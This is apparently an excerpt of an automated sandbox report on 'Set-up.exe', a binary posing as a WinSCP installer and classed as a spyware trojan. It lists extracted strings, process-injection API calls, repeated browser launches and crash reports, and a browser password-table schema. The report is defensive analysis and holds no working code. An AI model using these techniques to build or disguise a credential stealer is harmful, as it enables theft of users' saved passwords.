Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe String found in binary or memory: https://filezilla-project.org/bThis
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-up.exe String found in binary or memory: https://github.com/UweRaabe/PngComponents
Source: Set-up.exe String found in binary or memory: https://github.com/bji/libs30https://github.com/bji/libs3/blob/master/LICENSE$Error
Source: Set-up.exe String found in binary or memory: https://github.com/plashenkov/TBX
Source: Set-up.exe String found in binary or memory: https://jcl.delphi-jedi.org/
Source: Set-up.exe String found in binary or memory: https://jrsoftware.org/tb2kdl.php
Source: Set-up.exe String found in binary or memory: https://libexpat.github.io/?https://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html
Source: Set-up.exe String found in binary or memory: https://notroj.github.io/neon/
Source: Set-up.exe String found in binary or memory: https://openssl-library.org/)WebDAV/HTTP
Source: Set-up.exe String found in binary or memory: https://winscp.net/#https://winscp.net/eng/docs/history
Source: Set-up.exe String found in binary or memory: https://winscp.net/D
Source: Set-up.exe String found in binary or memory: https://winscp.net/eng/docs/?ver=%s&lang=%s-https://winscp.net/eng/docs/%s?ver=%s&lang=%s
Source: Set-up.exe String found in binary or memory: https://winscp.net/eng/donate.php
Source: Set-up.exe String found in binary or memory: https://winscp.net/eng/translations.php:https://winscp.net/eng/docs/search.php?ver=%s&lang=%s&q=%sKh
Source: Set-up.exe String found in binary or memory: https://winscp.net/forum/
Source: Set-up.exe String found in binary or memory: https://winscp.net/updates.php#https://winscp.net/eng/download.php
Source: Set-up.exe String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-up.exe String found in binary or memory: https://www.fsf.org/
Source: Set-up.exe String found in binary or memory: https://www.gnu.org/licenses/
Source: Set-up.exe String found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026711E5 CreateThread,malloc,NtClose,free, 0_2_026711E5
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0267066E NtProtectVirtualMemory, 0_2_0267066E
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02670B72 NtGetContextThread,NtSetContextThread,NtResumeThread, 0_2_02670B72
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02670CD8 NtAllocateVirtualMemory, 0_2_02670CD8
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026710E8 NtClose, 0_2_026710E8
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026719C5 free,NtClose,free, 0_2_026719C5
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0267114C NtClose, 0_2_0267114C
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02671084 NtClose, 0_2_02671084
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02688419 NtWriteVirtualMemory, 0_2_02688419
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026884E0 NtWow64QueryInformationProcess64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64, 0_2_026884E0
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026886C0 NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64, 0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D2039 NtAllocateVirtualMemory, 0_2_043D2039
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D208C NtFreeVirtualMemory, 0_2_043D208C
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D20CA NtProtectVirtualMemory, 0_2_043D20CA
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_026886C0 0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D062F 0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D003E 0_2_043D003E
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144
Source: Set-up.exe, 00000000.00000000.1342881075.0000000000D46000.00000020.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe, 00000000.00000000.1347349204.0000000001E18000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe
Source: Set-up.exe Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@30/49@1/1
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D0D3F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle, 0_2_043D0D3F
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Code function: 1_2_0000000140001130 LoadLibraryA,CoInitializeEx,allocator,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CoCreateInstance, 1_2_0000000140001130
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1380
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3832
Source: C:\Windows\System32\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3a74326-2ebc-43e9-ac64-3fe40897303f Jump to behavior
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Set-up.exe, 00000000.00000003.1524189472.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D62000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1495551156.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1485719615.000001438427A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.1496803859.000001FB4001F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Set-up.exe String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe String found in binary or memory: set-addPolicy
Source: Set-up.exe String found in binary or memory: kernel32LoadLibraryExA\/AddDllDirectory\<
Source: Set-up.exe String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:58:50+01:00" xmp:ModifyDate="2022-09-01T10:59:47+01:00" xmp:MetadataDate="2022-09-01T10:59:47+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" xmpMM:DocumentID="adobe:docid:photoshop:1fdce7f7-d0f3-8345-8210-9a399dc0c608" xmpMM:OriginalDocumentID="xmp.did:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c" stEvt:when="2022-06-27T15:58:50+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" stEvt:when="2022-09-01T10:59:47+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Source: Set-up.exe String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:59:46+01:00" xmp:ModifyDate="2022-09-01T11:07:26+01:00" xmp:MetadataDate="2022-09-01T11:07:26+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" xmpMM:DocumentID="adobe:docid:photoshop:38f42b90-13ae-6648-ac1e-ffa02882af0e" xmpMM:OriginalDocumentID="xmp.did:c0055a1b-163f-6548-addc-8e97eea98b83"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:c0055a1b-163f-6548-addc-8e97eea98b83" stEvt:when="2022-06-27T15:59:46+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" stEvt:when="2022-09-01T11:07:26+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 204
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 92
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 152
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 92
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 228
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 92
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 92
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 92
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mpr.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netapi32.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: shfolder.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: oleacc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wkscli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Section loaded: sxs.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 23057920 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xe2c400
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x267800
Source: Set-up.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x473600
Source: Set-up.exe Static PE information: More than 200 imports for KERNEL32.DLL
Source: Set-up.exe Static PE information: More than 200 imports for USER32.DLL
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: Set-up.exe Static PE information: section name: .didata
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
